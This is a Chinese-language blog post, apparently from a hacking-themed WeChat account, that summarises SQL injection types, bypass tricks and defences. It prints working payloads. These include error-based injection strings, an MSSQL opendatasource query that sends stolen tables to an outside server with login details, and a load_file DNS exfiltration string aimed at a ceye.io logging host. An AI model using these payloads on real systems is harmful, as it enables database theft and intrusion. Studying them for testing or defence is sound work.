公粽号:黒掌
一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主!
1sql注入总结
原理:用户输入的数据当作sql语句拼接到程序代码中执行
可能存在注入的地方:登录页面、搜索处、HTTP头信息等
注入类型:报错注入、header注入、盲注、宽字节注入、mssql反弹注入、dns注入等
报错注入
原理:利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中
报错注入相关函数及使用方法:
floor 例句:and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ExtractValue 例句:and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
UpdateXml 例句:and 1=(updatexml(1,concat(0x3a,(selectuser())),1))
exp 例句:and exp(~(select * from (select user () ) a) );
polygon 例句:and polygon (()select * from(select user ())a)b );
......
防御方法:
1、屏蔽能造成报错注入的各种函数
2、统一返回不含错误提示信息的回显页面
3、使用数据库防火墙、拦截危险SQL语句
header注入
原理:利用后端验证客户端口信息或者通过Header中获取客户端的一些信息,
因为这些信息在某些地方是会和其他信息一起存储到数据库中,然后再在前台显示出来,
又因为后台没有进过相对应的信息处理所以构成了sql注入
可能出现的地方
host 客户端指定自己想访问的WEB服务器的域名/IP 地址和端口号
User-Agent 使得服务器能够识别客户使用的操作系统,游览器版本等.
Referer 浏览器向 WEB 服务器表明自己是从哪个页面链接过来的
X-Forwarded-For 简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,
(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])
Clien-IP 同上
Cookie 网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据
宽字节注入
原理:利用mysql特性, 在使用GBK编码时将/进行转义ASCII码传输中文是会变成字符串
MySQL中用于转义的函数addslashes、mysql_real_escape_string、mysql_escape_string、magic_quotes_gpc
作用:当PHP的传参中有特殊字符就会在前面加转义字符’\’,来做一定的过滤
绕过思路
因为宽字节注入主要是吃掉 \ ,所以一般时候加一个 %df 这种就可以吃掉,加汉字也可以
mssql反弹注入
原理:依靠opendatasource函数,把查询出来的数据发送到我们的MSSQL服务器上
条件:要满足堆叠查询
环境搭建
使用香港云(http://www.webweb.com/)搭建mssql数据库,获取公网IP
显错注入步骤:
1、判断注入点
2、猜字段
3、联合查询(记住要写union all),输出点用NULL填充,注释只有—
4、select name from dbo.sysdatabases 查询系统库
5、sysobjects 查询系统表 (xtype=’U’)
6、syscolumns 字段 (id= ) 指定sysobjects库中表名对应id
使用的函数
opendatasource函数作用:可以理解为将当前数据库查询的结果发送到另一数据库服务器中
语法:opendatasource(provider_name,init_string)
provider_name :注册为用于访问数据源的OLE DB 提供程序的PROGID的名称,MSSQL的名称为SQLOLEDB
init_string:
连接字符串
连接地址、端口、用户名、密码、数据库名
server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称
例句:insert into opendatasource(‘sqloledb’,’server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;
pwd=zkaqzkaq;database=DB_14A5E44_zkaq’).DB_14A5E44_zkaq.dbo.temp select * from admin —
DNS注入(只能使用在mysql)
原理:通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录
此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志
什么是DNS?
是一个域名系统,是一项网络服务,它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网,DNS注入就是利用了DNS这个通道
使用的函数
load_file函数作用:用于读取文件内容,并返回输出
使用条件
1、文件必须在服务器上
2、要有绝对路径
3、要有file权限,所有字节可读
4、文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)
当load_file无法读取文件的解决方法:在mysql配置文件最后一行加一行secure_file_priv=
例句:
and (SELECT LOAD_FILE(CONCAT(‘\‘,(select database()),’.0cv5gr.ceye.io\abc’)))#
select load_file()打开文件,concat是拼接函数,\+子查询出来的结果+.0cv5gr.ceye.io\abc
相当于数据库去访问\+子查询出来的结果+.0cv5gr.ceye.io\abc的共享文件夹然后被DNS服务器记录下来
盲注
理解:利用数据库内置函数执行的结果来判断语句是否被执行
类型
布尔型盲注:根据返回页面判断条件真假的注入
时间型盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断
用到的函数及语句
length()函数:返回字符串的长度
ascii() 查询ascii码中对应的值
substr(str,pos,num) :截取指定位置指定长度的字符串
mid(str,pos,num) :截取指定位置指定长度的字符串
sleep() 将程序挂起一段时间
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
攻击总体思路
1、寻找SQL注入的位置
2、判断服务器类型和后台数据库类型
3、针对不同的服务器和数据库特点进行SQL注入攻击
特殊表
MySQL数据库的特有的表是 information_schema.tables
access数据库特有的表是 msysobjects
SQLServer 数据库特有的表是 sysobjects
数据库重要信息
version() :数据库的版本
database() :当前所在的数据库
@@basedir : 数据库的安装目录
@@datadir :数据库文件的存放目录
user() :数据库的用户
current_user() : 当前用户名
system_user() : 系统用户名
session_user() :连接到数据库的用户名
SQL注入绕过方法
1、大小写绕过
2、双写绕过
3、编码绕过
4、内联注释绕过
5、关键字替换(例如:空格用+替换、and用&&替换等)
6、等价函数绕过(例如:hex()、bin()=ascii()、mid()、substr()=substring()等)
7、HTTP参数污染
8、缓冲区溢出绕过
危害
数据库信息泄露
网页篡改:登陆后台后发布恶意内容
网站挂马 : 当拿到webshell时或者获取到服务器的权限以后,
可将一些网页木马挂在服务器上,去攻击别人
私自添加系统账号
读写文件获取webshell
防御方法
1、对进去数据库的特殊字符(单双引号 尖括号等)进行编码转换
2、不要使用动态拼装SQL,使用参数化SQL
3、不要使用管理员权限的数据连接,最好为每个应用使用单独的数据库连接
4、应用异常信息尽量给出少的提示,最好自定义报错信息对原始报错信息进行包装
5、使用防火墙,安全狗,云盾等
今天的分享就到这里,喜欢的小伙伴记得点赞收藏转发,我有一个公粽号【黒掌】, 里面分享了更多黑客秘籍,欢迎来耍!
![MyBatis-Plus 之AR模式[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)